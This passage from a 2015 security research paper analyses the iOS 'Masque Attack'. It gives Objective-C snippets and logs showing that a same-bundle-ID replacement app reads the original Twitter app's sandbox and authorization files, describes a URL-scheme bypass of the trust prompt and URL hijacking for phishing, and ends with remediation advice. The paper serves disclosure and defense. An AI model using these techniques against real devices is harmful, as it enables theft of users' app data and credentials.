http://erik.io/blog/2014/10/10/vulnerability-apple-portal-compromised-keychain-
access-groups/.
2.3.3 Access to the bundle’s files
This check was done to make sure that the old files in the bundle were completely
substituted by the new ones.
The following code was used to verify the version of the new bundle available inside the
Info.plist file:
NSString *appVersion = [[NSBundle mainBundle]
objectForInfoDictionaryKey:@"CFBundleVersion"];
NSLog(@"Bundle App version in Info.plist file: %@", appVersion);
As it is possible to see from the following log, the bundle version displayed is 1 (that was
set by Minded Security on the Xcode project for the new app), while the original version
at the time of writing was the 6.21.1:
14. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 13
Twitter[1708] <Warning>: Bundle App version in Info.plist file: 1
Another test was done to check that files belonging to the old bundle, and surely not
present in the new one, were disappeared.
As an example, searching for the file favorite.vector available in the previous
application’s bundle:
NSString *filePath = [[NSBundle mainBundle] pathForResource:@"favorite"
ofType:@"vector"];
NSString *myText = [NSString stringWithContentsOfFile:filePath];
if (myText) {
NSLog(@"favorite.vector exists");
}
NSLog(@"favorite.vector file contents: %@", myText);
The following log is obtained:
Twitter[1708]: (null)
Bundle of the application, as expected, is completely overwritten by that of the new one
without leaving any old files.
2.3.4 Access to the files in the sandbox
The last test was dedicated to checking which files in the sandbox could be accessed by
the new application.
In particular, the code used to read the content of the Documents folder is presented
next. This directory is where you write data that the application generates during
runtime and that you want to persist between runs of the application. Moreover, it is
backed up when the device is synchronized with iTunes or iCloud.
NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,
NSUserDomainMask, YES);
NSLog(@"Document folder path: %@", paths);
NSString *documentsDirectory = [paths objectAtIndex:0];
NSError * error;
NSArray * directoryContents = [[NSFileManager defaultManager]
contentsOfDirectoryAtPath:documentsDirectory
error:&error];
15. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 14
NSLog(@"Document folder contents: %@",directoryContents);
The following log shows that it is possible to list and access all the files belonging to the
Documents folder of the old app:
Twitter[1708] <Warning>: Documents folder contents: (
"com.atebits.tweetie.application-important-state",
"com.atebits.tweetie.application-state",
"com.atebits.tweetie.authorizationmanager",
"com.atebits.tweetie.authorizationmanagerTFNAuthorizationManagerData.data",
"com.atebits.tweetie.authorizationmanagerTFNAuthorizationManagerRequestCounts.data",
"com.atebits.tweetie.configuration",
"com.atebits.tweetie.sentinel"
)
It is also possible to access the folder where cache files are stored, that is the
Library/Caches folder, using the following code:
NSString *cachesPath = [NSSearchPathForDirectoriesInDomains(NSCachesDirectory,
NSUserDomainMask, YES) objectAtIndex:0];
NSString *cacheDir = [cachesPath stringByAppendingPathComponent:@"com.atebits.Tweetie2"];
NSError * error;
NSArray * directoryContents = [[NSFileManager defaultManager]
contentsOfDirectoryAtPath:cacheDir error:&error];
NSLog(@"Contents of Library/Caches/com.atebits.Tweetie2 folder: %@",directoryContents);
From the following log it is possible to see the presence of the old cache’s files (indeed,
the new app does not use any kind of caching):
Twitter[1708] <Warning>: Content of Library/Caches/com.atebits.Tweetie2 folder: (
"Cache.db",
"Cache.db-shm",
"Cache.db-wal"
)
So it is possible to infer that the new application is able to access the files that were in
the sandbox of the previous installed app.
16. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 15
2.4 Masque Attack via URL Schemes
On 19 February 2015 FireEye security researchers have presented a new kind of Masque
Attack exploiting URL Schemes vulnerabilities2.
On iOS 8, whenever a user is launching an enterprise-signed app for the first time, he is
asked to trust or not the new signing party, as can be seen from the following
screenshot:
If a user clicks on “Don’t trust” the app does not open.
It has been discovered that this precaution is not enough: indeed, it is possible to bypass
this alert message exploiting the present implementation of URL Schemes.
This can be demonstrated using the following setup:
An Apple device with iOS 8.1.2 installed;
A widespread installed app like, for example, Facebook;
An enterprise-signed app registering an URL Scheme identical to that used by the
previous app.
So, it is possible to create an enterprise-signed app registering an URL Schemes used by
Facebook, fb://, and bypass the alert prompt calling that URL Scheme to open the
malicious app.
Note that, other than Safari, other third-party apps could be using URL Schemes of
popular apps, as for the Facebook login.
2 https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html
17. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 16
This way iOS launches the enterprise-signed app registered to handle the URL scheme
without prompting for trust, even if the user has always clicked “Don’t Trust”. It doesn’t
matter whether the user has launched that enterprise-signed app before.
This can be used in order to mount phishing attacks and steal credentials when the UI of
the original app is mimicked, or launch the malicious app although the lack of trust by
the user.
This vulnerability has been fixed in iOS 8.1.3.
A very detailed list of all the URL Schemes registered by the apps can be found at this
link: http://handleopenurl.com.
It is also important to note that there is another type of Masque Attack that can be
accomplished via URL Schemes Hijacking.
In fact, according to iOS Developer Library3, “If more than one third-party app registers
to handle the same URL scheme, there is currently no process for determining which app
will be given that scheme”.
So, the attackers can publish an app directly into the App Store that registers URL
Schemes identical to the ones of legitimate popular apps, with the exception of the ones
predefined by Apple. Through this, attackers can reproduce a legitimate app UI to
perform phishing attacks to steal credentials or gather data intended to be shared
between two trusted apps.
This vulnerability has not yet been fixed.
3
https://developer.apple.com/library/ios/documentation/iPhone/Conceptual/iPhoneOSProgramming
Guide/Inter-AppCommunication/Inter-AppCommunication.html
18. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 17
3 Remediation
Masque Attack is one of the few attacks also effective on non jailbroken Apple iOS
device and so it is a very interesting topic to analyze.
In this paper it was successfully verified that a legit application on a device can be
overwritten with a malware app that has the same bundle identifier. This app can be
installed by the user via OTA using an enterprise provisioning profile (stolen ones are not
difficult to find).
The files belonging to the previous application that can be accessed by the new one are
the following:
Preferences File;
Files in the sandbox (Documents, Library/Preferences, Library/Caches, etc.)
Bundle files are instead completely substituted by the new installation.
Furthermore, the access on Keychain entries related to the previous installation is
forbidden due to the fact that is not possible to forge a provisioning file with an arbitrary
AppID, unless the vulnerability illustrated in the section 2.3.2.
Moreover, it has been discovered that the alert that prompts the user when an
enterprise-signed app is launched for the first time can be easily bypassed leveraging the
present implementation of URL Schemes.
As a last thing, it is notable that at this time the URL Scheme Hijacking vulnerability
explained at the end of section 2.4 has not yet been fixed.
On 27 Jan 2015, Apple released iOS 8.1.3. This update fixes this vulnerability
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4493); moreover now iOS
also prompts for trust when first opening an enterprise-signed application improving
code signature validation (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-
4494) also when URL Schemes are used.
So, it is advisable to use only Apple devices with iOS >= 8.1.3 in order to surely defense
from this threat. Note that the URL Schemes Hijacking vulnerability illustrated at the end
of section 2.4 has not yet been fixed.
iOS users can protect themselves from Masque Attack by following these 4 steps:
Update iOS on the device to a version >= 8.1.3 as suggested above. Note that the URL
Schemes Hijacking vulnerability illustrated at the end of section 2.4 has not yet been
fixed;
Don’t install apps from third-party sources other than Apple’s official App Store or the
user’s own organization;
Don’t click “Install” on a pop-up from a third-party web page;
19. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 18
When opening an app, if iOS shows an alert with “Untrusted App Developer”, click on
“Don’t Trust” and uninstall the app immediately. Nevertheless note that this alert can be
bypassed as shown in section 2.4 if iOS >= 8.1.3 is not installed.
iOS developers can mitigate the impact of Masque Attack on their apps and users
following (a mix of) these advice:
On the app first launch check if the app is installed on a device that has iOS 8.1.3
onwards. If this is not the case, alert the users of the possible threat. In order to do that
check the [UIDevice currentDevice].systemVersion property.
On the Xcode app project, set the Deployment target to 8.2 when it will be available.
Note that in this way only users with an iOS version >= 8.2 will be able to run the
application;
Enforce the use of all the best practices for writing secure iOS code: cipher all the
sandbox file and store sensitive information on the Keychain only, as this is a safe place
against this kind of attack.
Think about using a push notification service in order to check if an app is already on the
device or it has been uninstalled. In particular, check the related Feedback Service
(https://developer.apple.com/library/ios/documentation/NetworkingInternet/Conceptua
l/RemoteNotificationsPG/Chapters/CommunicatingWIthAPS.html#//apple_ref/doc/uid/T
P40008194-CH101-SW3).
In a scenario where an attacker could reuse the original binary and insert only a backdoor
inside, a mitigation might be found implementing a check at the start of the application in
order to verify the AppID of the app. If the AppID is not equal to the right hardcoded one,
the app closes. This assumes that the AppID of the malware app is different from the
original one and that the check is not bypassed. See the following link for an
implementation idea: http://stackoverflow.com/questions/11726672/access-app-
identifier-prefix-programmatically
20. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 19
Glossary
4
https://developer.apple.com/library/ios/documentation/IDEs/Conceptual/AppStoreDistributionTutori
al/CreatingYourTeamProvisioningProfile/CreatingYourTeamProvisioningProfile.html
Term Description
Mobile provisioning A mobile provisioning profile4 creates an association between
an application and a developer/organization: that is, a link
between a developer certificate and an AppID is created. More
on AppID in the next section.
A provisioning profile must be installed on every device intended to
run own application code.
Each profile contains:
A set of developer certificates whose public key must be
matched with the private key installed on the Keychain inside
the host on which the application is compiled.
Devices’ UDID on which the application will run. The devices
detailed inside the provisioning profile can be used for testing
only by the users that have a developer certificate inside the
profile.
The AppID.
The entitlements used. These award special capabilities or
security permissions to the application. Among the
entitlements, the use of iCloud, push notification and
Keychain access can be found.
One device can contain more than one provisioning profile.
AppID The AppID is an important asset of the code-signing process. It
specifies which are the applications authorized by the profile to be
signed and launched. This identifier is a string composed by two
parts:
1. The Team ID, provided by Apple and unique for each
development team
2. The bundle identifier of the single application. The AppID is
located inside the provisioning file.
The prefix of the AppID, which is the Team ID, results to be very
important from a security perspective: apps with the same prefix
share their application data leaping over classic iOS sandbox
21. Masque Attack
Edition: v1.0 Date: 03-03-2015
Page 20
5 Johnny Long, Google Hacking for Penetration Testers, Syngress Publishing, 2004. ISBN 1-
931836-36-1
boundaries.
The same concept is valid also for the Keychain entries: apps with the
same prefix share the access to all their entries.
As a rule, Apple guarantees that different apps from the same
developer can have the same prefix, but different apps from different
developers cannot.
Bundle Identifier Bundle Identifier is the unique string that precisely identifies a single
application.
It is typically composed by two parts:
1. One related to the company identifier
2. One related with the product name inserted during the
setting of the Xcode project.
Moreover, this is also the identifier used when an app update is
needed: when a user installs an application with the same bundle
identifier of another already presents on the device, iOS knows that
this has to be updated substituting its bundle with the new one.
Display Name Display Name is the identifier that iOS uses to show the app’s name
on the Springboard.
Google Dorks Google hacking5
involves the use of advanced operators in the
Google Search Engine to locate the specific string of text within
search results.
It means that it is possible to leverage operators provided by Google
to narrow the search results.
Generally these operators are called Google Dorks.